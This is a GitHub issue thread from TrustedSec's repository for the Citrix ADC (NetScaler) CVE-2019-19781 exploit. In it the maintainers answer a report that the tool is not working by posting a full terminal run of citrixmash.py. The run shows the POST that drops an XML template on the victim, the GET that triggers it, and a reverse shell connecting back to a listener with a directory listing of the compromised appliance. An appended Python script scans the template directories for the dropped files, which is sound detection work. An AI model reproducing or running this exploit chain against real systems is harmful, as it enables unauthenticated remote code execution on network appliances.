trustedsec / cve-2019-19781

This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.

The test results are not accurate #15

Closed 0xTract0r closed 4 years ago

0xTract0r commented 4 years ago

The result of cve-2019-19781_scanner.py is still vulnerable but citrixmash.py is not successful. I tried many

trustedsec commented 4 years ago

Are you running the latest versions of the scanner and exploit? I've been testing it on over 10,000 systems and have test cases up for every instance of ADC. Works as intended.

trustedsec commented 4 years ago

root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# ./citrixmash.py 8889 8080

Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
Company: TrustedSec, LLC
Tool Written by: Rob Simon and Dave Kennedy
Contributions: The TrustedSec Team
Website: https://www.trustedsec.com
INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/

This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.

Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/

IP Addresses and DNS names are usable in the victim address and attacker_listener fields (if host supports DNS).

Usage:

python3 citrixmash.py

[] Firing STAGE1 POST request to create the XML template exploit to disk...
[] Saving filename as ychyhdqwwg.xml on the victim machine...
[] We got an expected response back for a vulnerable system. Initial stage exploit likely successful.
[] Sleeping for 2 seconds to ensure file is written before we call it...
[] Triggering GET request for the newly created file with a listener waiting...
[] Shell should now be in your listener... enjoy. Keep this window open..
[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/
Connection from 42280 received!
sh: can't access tty; job control turned off
\u@ns$ ls
bin colorful compat configdb dev etc flash home lib libexec mnt netscaler nscache nsconfig optional proc root sbin tmp usr var
\u@ns$
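A defender-side triage check for the two artifact directories the tool banner above tells operators to clean up (an added example; it is not part of the TrustedSec tool or of this thread). It lists .xml templates modified within a lookback window and flags ten-letter random names like the one shown in the output; the ten-letter heuristic is an assumption drawn from that single filename, and the sample directory is constructed with tempfile so the script runs offline.

```python
import os
import re
import tempfile
import time

# The two artifact locations the tool's own banner tells the operator to clean up.
TEMPLATE_DIRS = ["/var/tmp/netscaler/portal/templates", "/netscaler/portal/templates"]
# Heuristic (assumption): the thread shows one dropped file, ychyhdqwwg.xml, i.e.
# ten random lowercase letters; legitimate templates tend to carry meaningful names.
RANDOM_NAME = re.compile(r"^[a-z]{10}\.xml$")


def find_recent_templates(dirs, since_epoch):
    """Return sorted (path, mtime, flags) for .xml files modified at or after since_epoch."""
    hits = []
    for d in dirs:
        if not os.path.isdir(d):          # directory absent on this host: skip quietly
            continue
        for name in os.listdir(d):
            path = os.path.join(d, name)
            if not (name.endswith(".xml") and os.path.isfile(path)):
                continue
            mtime = int(os.stat(path).st_mtime)
            if mtime < since_epoch:       # older than the window: not of interest
                continue
            flags = ["random-10-char-name"] if RANDOM_NAME.match(name) else []
            hits.append((path, mtime, flags))
    return sorted(hits)


def build_fixture():
    """Constructed sample dir: one week-old benign template, one freshly dropped file."""
    root = tempfile.mkdtemp(prefix="ns-templates-")
    for name in ("default.xml", "ychyhdqwwg.xml"):   # second name taken from the thread
        with open(os.path.join(root, name), "w") as f:
            f.write("<template/>")
    week_ago = time.time() - 7 * 86400
    os.utime(os.path.join(root, "default.xml"), (week_ago, week_ago))
    return root


def triage(root, lookback_seconds=86400):
    """Scan one directory for templates written within the lookback window."""
    since = int(time.time()) - lookback_seconds
    return find_recent_templates([root], since)


if __name__ == "__main__":
    # On a real appliance pass TEMPLATE_DIRS instead of the constructed fixture.
    for path, mtime, flags in triage(build_fixture()):
        print(time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(mtime)), path, flags)
```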